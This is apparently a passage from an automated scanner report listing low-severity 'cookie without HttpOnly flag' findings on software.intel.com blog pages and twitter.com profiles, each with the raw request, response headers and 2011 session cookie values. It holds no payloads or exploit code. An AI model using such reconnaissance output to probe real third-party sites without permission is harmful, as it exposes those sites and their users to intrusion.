Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:55 GMT
Content-Length: 537
Connection: close
Set-Cookie: PHPSESSID=94087cf7981dbc449a184ad7e31d34d0; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:55 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

12.34. http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=bdd17db69f4af41eb346e39496779504; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 40339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.35. http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/feed/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:52 GMT
Content-Length: 1181
Connection: close
Set-Cookie: PHPSESSID=288fc6a5a0c3418583dcc32f57fcb672; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:52 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

12.36. http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=a4e51d252757c97212e7d2d038ee7a76; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 38246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.37. http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/feed/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:55 GMT
Content-Length: 519
Connection: close
Set-Cookie: PHPSESSID=43768f37fef278f86fa1efb8d4f61896; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:55 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

12.38. http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=23acb205107344b897198d1b0053cbc6; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 36724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.39. http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/feed/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:50 GMT
Content-Length: 512
Connection: close
Set-Cookie: PHPSESSID=de5232cce9bb1b07e0e2c06efb170581; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:50 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

12.40. http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=3132f08882351b5b69f11ba86bbd295a; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 36511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.41. http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/feed/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:46 GMT
Content-Length: 578
Connection: close
Set-Cookie: PHPSESSID=00b720de8f611fc1545738ce8829c525; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:46 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

12.42. http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=d05389110c2d2011353f05e29b09f232; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 36400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.43. http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update/feed/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:44 GMT
Content-Length: 510
Connection: close
Set-Cookie: PHPSESSID=0b26808766bae72a678c3d39c963c461; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:44 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

12.44. http://software.intel.com/en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:40 GMT
Content-Length: 20519
Connection: close
Set-Cookie: PHPSESSID=a638f3cc0588735e2cef74d00d31654d; path=/; domain=intel.com
Set-Cookie: loginpt=0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.45. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=870d40b73302ba266471c5df270a786b; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 38292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.46. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/feed/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:37 GMT
Content-Length: 580
Connection: close
Set-Cookie: PHPSESSID=9f96f042ab3fd9912fec4ad3f015ce74; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:37 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

12.47. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=7c7fa33f5e3871a2f2f8ad2e5fc6cc5f; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 40744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.48. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/feed/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:37 GMT
Content-Length: 522
Connection: close
Set-Cookie: PHPSESSID=6d3271afbdfbfe0b4dd22d4ac3e9d131; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:37 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

12.49. http://software.intel.com/sites/academic_showcase/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /sites/academic_showcase/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/academic_showcase/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:22:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=f5d3a15404bf24e6472fb4f75010d9f2; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 50705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.50. http://twitter.com/EricMMartin

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /EricMMartin

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /EricMMartin HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 05 Feb 2011 23:22:34 GMT
Server: hi
Status: 200 OK
X-Transaction: Sat Feb 05 23:22:34 +0000 2011-15854-13086
ETag: "b0c81407bf609b9b1cf953048b1105ab"
Last-Modified: Sat, 05 Feb 2011 23:22:34 GMT
X-Runtime: 0.00598
Content-Type: text/html; charset=utf-8
Content-Length: 58433
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296948154509230; path=/; expires=Sat, 12-Feb-11 23:22:34 GMT; domain=.twitter.com
Set-Cookie: guest_id=129694815451621917; path=/; expires=Mon, 07 Mar 2011 23:22:34 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJZQIvgtAToHaWQiJTMyMDRkZDM2M2Y2OTVm%250AMjM0ZWVmYjAyMjcyMGRlYWM0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--cda732cdfd73b9251d4ab751bf5e3c3ba07fa792; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

12.51. http://twitter.com/intel

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /intel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /intel HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 05 Feb 2011 23:22:35 GMT
Server: hi
Status: 200 OK
X-Transaction: Sat Feb 05 23:22:35 +0000 2011-36832-54399
ETag: "3f5b73f849632157648b0cfb3f55a625"
Last-Modified: Sat, 05 Feb 2011 23:22:35 GMT
X-Runtime: 0.00573
Content-Type: text/html; charset=utf-8
Content-Length: 57222
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296948155814524; path=/; expires=Sat, 12-Feb-11 23:22:35 GMT; domain=.twitter.com
Set-Cookie: guest_id=129694815582299188; path=/; expires=Mon, 07 Mar 2011 23:22:35 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCK9VIvgtAToHaWQiJTZlNDMwNDM3NzI0Y2Zk%250AMzE2ZDVlMGRkYTQ2ZGMyNzdjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a5011ad7a2fc54a431253ef8fa174a4aab1fa4cd; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

12.52. http://twitter.com/intelnews

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /intelnews

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /intelnews HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 05 Feb 2011 23:22:36 GMT
Server: hi
Status: 200 OK
X-Transaction: Sat Feb 05 23:22:36 +0000 2011-99178-30534
ETag: "5ef92426ebdf2d0090dae9af07327303"
Last-Modified: Sat, 05 Feb 2011 23:22:36 GMT
X-Runtime: 0.00428
Content-Type: text/html; charset=utf-8
Content-Length: 50405
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296948156798428; path=/; expires=Sat, 12-Feb-11 23:22:36 GMT; domain=.twitter.com
Set-Cookie: guest_id=129694815680453038; path=/; expires=Mon, 07 Mar 2011 23:22:36 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
